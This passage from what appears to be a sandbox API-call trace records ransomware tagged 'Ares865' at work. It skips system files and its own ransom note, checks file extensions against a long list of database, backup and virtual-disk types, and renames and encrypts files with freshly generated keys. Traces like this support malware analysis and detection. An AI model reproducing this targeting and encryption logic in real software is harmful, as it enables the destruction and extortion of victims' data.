(lpString1="ico", lpString2="sbf") returned -1 [0089.453] lstrlenW (lpString="scx") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.453] lstrlenW (lpString="sdb") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.453] lstrlenW (lpString="sdc") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.453] lstrlenW (lpString="sdf") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.453] lstrlenW (lpString="sis") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.453] lstrlenW (lpString="spq") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.453] lstrlenW (lpString="te") returned 2 [0089.453] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0089.453] lstrlenW (lpString="teacher") returned 7 [0089.453] lstrcmpiW (lpString1="ync.ico", lpString2="teacher") returned 1 [0089.453] lstrlenW (lpString="tmd") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.453] lstrlenW (lpString="tps") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.453] lstrlenW (lpString="trc") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.453] lstrlenW (lpString="trc") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.453] lstrlenW (lpString="trm") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.453] lstrlenW (lpString="udb") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.453] lstrlenW (lpString="udl") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.453] lstrlenW (lpString="usr") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.454] lstrlenW (lpString="v12") returned 3 [0089.454] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.454] lstrlenW (lpString="vis") returned 3 [0089.454] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0089.454] lstrlenW (lpString="vpd") returned 3 [0089.454] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.454] lstrlenW (lpString="vvv") returned 3 [0089.454] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.454] lstrlenW (lpString="wdb") returned 3 [0089.454] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.454] lstrlenW (lpString="wmdb") returned 4 [0089.454] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.454] lstrlenW (lpString="wrk") returned 3 [0089.454] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.454] lstrlenW (lpString="xdb") returned 3 [0089.454] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.454] lstrlenW (lpString="xld") returned 3 [0089.454] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.454] lstrlenW (lpString="xmlff") returned 5 [0089.454] lstrcmpiW (lpString1="c.ico", lpString2="xmlff") returned -1 [0089.454] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.Ares865") returned 102 [0089.454] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.ares865"), dwFlags=0x1) returned 1 [0089.455] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.455] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49227) returned 1 [0089.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.456] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.456] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.456] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.457] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc350, lpName=0x0) returned 0x15c [0089.458] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc350) returned 0x190000 [0089.461] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.462] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.462] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.462] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.462] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.462] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.462] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.462] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.462] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.462] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.463] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.463] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.463] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.463] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.463] CloseHandle (hObject=0x15c) returned 1 [0089.463] CloseHandle (hObject=0x118) returned 1 [0089.463] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.463] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.463] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.464] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c219ec7, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x7c219ec7, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x4c7d8980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tasks.xml.Ares865", cAlternateFileName="")) returned 1 [0089.464] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.464] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0089.464] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2=".") returned 1 [0089.464] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="..") returned 1 [0089.464] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="windows") returned -1 [0089.464] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="bootmgr") returned 1 [0089.464] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="temp") returned -1 [0089.464] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="pagefile.sys") returned 1 [0089.464] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="boot") returned 1 [0089.464] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="ids.txt") returned 1 [0089.464] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="ntuser.dat") returned 1 [0089.464] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="perflogs") returned 1 [0089.464] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="MSBuild") returned 1 [0089.464] lstrlenW (lpString="tasks.xml.Ares865") returned 17 [0089.464] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 94 [0089.464] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="tasks.xml.Ares865" | out: lpString1="tasks.xml.Ares865") returned="tasks.xml.Ares865" [0089.464] lstrlenW (lpString="tasks.xml.Ares865") returned 17 [0089.464] lstrlenW (lpString="Ares865") returned 7 [0089.464] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.464] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d64214, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d64214, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmp.ico", cAlternateFileName="")) returned 1 [0089.464] lstrcmpiW (lpString1="wmp.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.464] lstrcmpiW (lpString1="wmp.ico", lpString2="aoldtz.exe") returned 1 [0089.464] lstrcmpiW (lpString1="wmp.ico", lpString2=".") returned 1 [0089.464] lstrcmpiW (lpString1="wmp.ico", lpString2="..") returned 1 [0089.464] lstrcmpiW (lpString1="wmp.ico", lpString2="windows") returned 1 [0089.464] lstrcmpiW (lpString1="wmp.ico", lpString2="bootmgr") returned 1 [0089.465] lstrcmpiW (lpString1="wmp.ico", lpString2="temp") returned 1 [0089.465] lstrcmpiW (lpString1="wmp.ico", lpString2="pagefile.sys") returned 1 [0089.465] lstrcmpiW (lpString1="wmp.ico", lpString2="boot") returned 1 [0089.465] lstrcmpiW (lpString1="wmp.ico", lpString2="ids.txt") returned 1 [0089.465] lstrcmpiW (lpString1="wmp.ico", lpString2="ntuser.dat") returned 1 [0089.465] lstrcmpiW (lpString1="wmp.ico", lpString2="perflogs") returned 1 [0089.465] lstrcmpiW (lpString1="wmp.ico", lpString2="MSBuild") returned 1 [0089.465] lstrlenW (lpString="wmp.ico") returned 7 [0089.465] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.Ares865") returned 103 [0089.465] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="wmp.ico" | out: lpString1="wmp.ico") returned="wmp.ico" [0089.465] lstrlenW (lpString="wmp.ico") returned 7 [0089.465] lstrlenW (lpString="Ares865") returned 7 [0089.465] lstrlenW (lpString=".dll") returned 4 [0089.465] lstrcmpiW (lpString1="wmp.ico", lpString2=".dll") returned 1 [0089.465] lstrlenW (lpString=".lnk") returned 4 [0089.465] lstrcmpiW (lpString1="wmp.ico", lpString2=".lnk") returned 1 [0089.465] lstrlenW (lpString=".ini") returned 4 [0089.465] lstrcmpiW (lpString1="wmp.ico", lpString2=".ini") returned 1 [0089.465] lstrlenW (lpString=".sys") returned 4 [0089.465] lstrcmpiW (lpString1="wmp.ico", lpString2=".sys") returned 1 [0089.465] lstrlenW (lpString="wmp.ico") returned 7 [0089.465] lstrlenW (lpString="bak") returned 3 [0089.465] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.465] lstrlenW (lpString="ba_") returned 3 [0089.465] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0089.465] lstrlenW (lpString="dbb") returned 3 [0089.465] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.465] lstrlenW (lpString="vmdk") returned 4 [0089.465] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.465] lstrlenW (lpString="rar") returned 3 [0089.465] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.465] lstrlenW (lpString="zip") returned 3 [0089.465] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.465] lstrlenW (lpString="tgz") returned 3 [0089.465] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.465] lstrlenW (lpString="vbox") returned 4 [0089.465] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.465] lstrlenW (lpString="vdi") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.466] lstrlenW (lpString="vhd") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.466] lstrlenW (lpString="vhdx") returned 4 [0089.466] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.466] lstrlenW (lpString="avhd") returned 4 [0089.466] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.466] lstrlenW (lpString="db") returned 2 [0089.466] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.466] lstrlenW (lpString="db2") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.466] lstrlenW (lpString="db3") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.466] lstrlenW (lpString="dbf") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.466] lstrlenW (lpString="mdf") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.466] lstrlenW (lpString="mdb") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.466] lstrlenW (lpString="sql") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.466] lstrlenW (lpString="sqlite") returned 6 [0089.466] lstrcmpiW (lpString1="mp.ico", lpString2="sqlite") returned -1 [0089.466] lstrlenW (lpString="sqlite3") returned 7 [0089.466] lstrlenW (lpString="sqlitedb") returned 8 [0089.466] lstrlenW (lpString="xml") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.466] lstrlenW (lpString="$er") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.466] lstrlenW (lpString="4dd") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.466] lstrlenW (lpString="4dl") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.466] lstrlenW (lpString="^^^") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.466] lstrlenW (lpString="abs") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.466] lstrlenW (lpString="abx") returned 3 [0089.466] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.467] lstrlenW (lpString="accdb") returned 5 [0089.467] lstrcmpiW (lpString1="p.ico", lpString2="accdb") returned 1 [0089.467] lstrlenW (lpString="accdc") returned 5 [0089.467] lstrcmpiW (lpString1="p.ico", lpString2="accdc") returned 1 [0089.467] lstrlenW (lpString="accde") returned 5 [0089.467] lstrcmpiW (lpString1="p.ico", lpString2="accde") returned 1 [0089.467] lstrlenW (lpString="accdr") returned 5 [0089.467] lstrcmpiW (lpString1="p.ico", lpString2="accdr") returned 1 [0089.467] lstrlenW (lpString="accdt") returned 5 [0089.467] lstrcmpiW (lpString1="p.ico", lpString2="accdt") returned 1 [0089.467] lstrlenW (lpString="accdw") returned 5 [0089.467] lstrcmpiW (lpString1="p.ico", lpString2="accdw") returned 1 [0089.467] lstrlenW (lpString="accft") returned 5 [0089.467] lstrcmpiW (lpString1="p.ico", lpString2="accft") returned 1 [0089.467] lstrlenW (lpString="adb") returned 3 [0089.467] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.467] lstrlenW (lpString="adb") returned 3 [0089.467] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.467] lstrlenW (lpString="ade") returned 3 [0089.467] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.467] lstrlenW (lpString="adf") returned 3 [0089.467] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.467] lstrlenW (lpString="adn") returned 3 [0089.467] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.467] lstrlenW (lpString="adp") returned 3 [0089.467] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.467] lstrlenW (lpString="alf") returned 3 [0089.467] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.467] lstrlenW (lpString="ask") returned 3 [0089.467] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.467] lstrlenW (lpString="btr") returned 3 [0089.467] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.467] lstrlenW (lpString="cat") returned 3 [0089.467] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.467] lstrlenW (lpString="cdb") returned 3 [0089.467] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.467] lstrlenW (lpString="ckp") returned 3 [0089.467] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.467] lstrlenW (lpString="cma") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.468] lstrlenW (lpString="cpd") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.468] lstrlenW (lpString="dacpac") returned 6 [0089.468] lstrcmpiW (lpString1="mp.ico", lpString2="dacpac") returned 1 [0089.468] lstrlenW (lpString="dad") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.468] lstrlenW (lpString="dadiagrams") returned 10 [0089.468] lstrlenW (lpString="daschema") returned 8 [0089.468] lstrlenW (lpString="db-journal") returned 10 [0089.468] lstrlenW (lpString="db-shm") returned 6 [0089.468] lstrcmpiW (lpString1="mp.ico", lpString2="db-shm") returned 1 [0089.468] lstrlenW (lpString="db-wal") returned 6 [0089.468] lstrcmpiW (lpString1="mp.ico", lpString2="db-wal") returned 1 [0089.468] lstrlenW (lpString="dbc") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.468] lstrlenW (lpString="dbs") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.468] lstrlenW (lpString="dbt") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.468] lstrlenW (lpString="dbv") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.468] lstrlenW (lpString="dbx") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.468] lstrlenW (lpString="dcb") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.468] lstrlenW (lpString="dct") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.468] lstrlenW (lpString="dcx") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.468] lstrlenW (lpString="ddl") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.468] lstrlenW (lpString="dlis") returned 4 [0089.468] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.468] lstrlenW (lpString="dp1") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.468] lstrlenW (lpString="dqy") returned 3 [0089.468] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.468] lstrlenW (lpString="dsk") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.469] lstrlenW (lpString="dsn") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.469] lstrlenW (lpString="dtsx") returned 4 [0089.469] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.469] lstrlenW (lpString="dxl") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.469] lstrlenW (lpString="eco") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.469] lstrlenW (lpString="ecx") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.469] lstrlenW (lpString="edb") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.469] lstrlenW (lpString="epim") returned 4 [0089.469] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.469] lstrlenW (lpString="fcd") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.469] lstrlenW (lpString="fdb") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.469] lstrlenW (lpString="fic") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.469] lstrlenW (lpString="flexolibrary") returned 12 [0089.469] lstrlenW (lpString="fm5") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.469] lstrlenW (lpString="fmp") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.469] lstrlenW (lpString="fmp12") returned 5 [0089.469] lstrcmpiW (lpString1="p.ico", lpString2="fmp12") returned 1 [0089.469] lstrlenW (lpString="fmpsl") returned 5 [0089.469] lstrcmpiW (lpString1="p.ico", lpString2="fmpsl") returned 1 [0089.469] lstrlenW (lpString="fol") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.469] lstrlenW (lpString="fp3") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.469] lstrlenW (lpString="fp4") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.469] lstrlenW (lpString="fp5") returned 3 [0089.469] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.469] lstrlenW (lpString="fp7") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.470] lstrlenW (lpString="fpt") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.470] lstrlenW (lpString="frm") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.470] lstrlenW (lpString="gdb") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.470] lstrlenW (lpString="gdb") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.470] lstrlenW (lpString="grdb") returned 4 [0089.470] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.470] lstrlenW (lpString="gwi") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.470] lstrlenW (lpString="hdb") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.470] lstrlenW (lpString="his") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.470] lstrlenW (lpString="ib") returned 2 [0089.470] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.470] lstrlenW (lpString="idb") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.470] lstrlenW (lpString="ihx") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.470] lstrlenW (lpString="itdb") returned 4 [0089.470] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.470] lstrlenW (lpString="itw") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.470] lstrlenW (lpString="jet") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.470] lstrlenW (lpString="jtx") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.470] lstrlenW (lpString="kdb") returned 3 [0089.470] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.470] lstrlenW (lpString="kexi") returned 4 [0089.470] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.470] lstrlenW (lpString="kexic") returned 5 [0089.470] lstrcmpiW (lpString1="p.ico", lpString2="kexic") returned 1 [0089.470] lstrlenW (lpString="kexis") returned 5 [0089.471] lstrcmpiW (lpString1="p.ico", lpString2="kexis") returned 1 [0089.471] lstrlenW (lpString="lgc") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.471] lstrlenW (lpString="lwx") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.471] lstrlenW (lpString="maf") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.471] lstrlenW (lpString="maq") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.471] lstrlenW (lpString="mar") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.471] lstrlenW (lpString="marshal") returned 7 [0089.471] lstrlenW (lpString="mas") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.471] lstrlenW (lpString="mav") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.471] lstrlenW (lpString="maw") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.471] lstrlenW (lpString="mdbhtml") returned 7 [0089.471] lstrlenW (lpString="mdn") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.471] lstrlenW (lpString="mdt") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.471] lstrlenW (lpString="mfd") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.471] lstrlenW (lpString="mpd") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.471] lstrlenW (lpString="mrg") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.471] lstrlenW (lpString="mud") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.471] lstrlenW (lpString="mwb") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.471] lstrlenW (lpString="myd") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.471] lstrlenW (lpString="ndf") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.471] lstrlenW (lpString="nnt") returned 3 [0089.471] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.471] lstrlenW (lpString="nrmlib") returned 6 [0089.472] lstrcmpiW (lpString1="mp.ico", lpString2="nrmlib") returned -1 [0089.472] lstrlenW (lpString="ns2") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.472] lstrlenW (lpString="ns3") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.472] lstrlenW (lpString="ns4") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.472] lstrlenW (lpString="nsf") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 